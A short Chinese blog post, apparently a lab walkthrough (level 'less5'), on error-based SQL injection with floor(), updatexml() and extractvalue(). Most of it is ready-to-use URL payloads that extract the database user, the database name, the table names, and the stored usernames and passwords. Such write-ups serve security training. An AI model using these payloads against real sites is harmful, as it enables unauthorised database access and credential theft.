本文详细介绍了如何通过报错注入技术(如 floor(), updatexml(), 和 extractValue())窃取数据库信息,包括库名、表名、用户名和密码。同时,展示了这些攻击手段的局限性,并强调了安全防范的重要性。
less5
更改id后无果,不能用union联合查询
此处用报错注入
报错注入的概念:
(1). 通过floor报错 and (select 1 from (select count(*),concat((
payload),floor (rand(0)*2))x from information_schema.tables group by
x)a) 其中payload为你要插入的SQL语句 需要注意的是该语句将 输出字符长度限制为64个字符
(2). 通过updatexml报错 and updatexml(1, payload,1)
同样该语句对输出的字符长度也做了限制,其最长输出32位
并且该语句对payload的反悔类型也做了限制,只有在payload返回的不是xml格式才会生效(3). 通过extractValue报错 and extractvalue(1, payload) 输出字符有长度限制,最长32位。
?id=1' union select updatexml(1,concat(0x7e,(select user()),0x7e),1)--+
获取库名:
?id=1' union select updatexml(1,concat(0x7e,(select database()),0x7e),1)--+
爆表名:
?id=1' union select updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema = 'security' limit 0,1),0x7e),1) --+
爆用户名:
?id=1' union select updatexml(1,concat(0x7e,(select group_concat(username) from users),0x7e),1) --+
爆密码:
?id=1' union select updatexml(1,concat(0x7e,(select group_concat(password) from users),0x7e),1) --+
5690
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
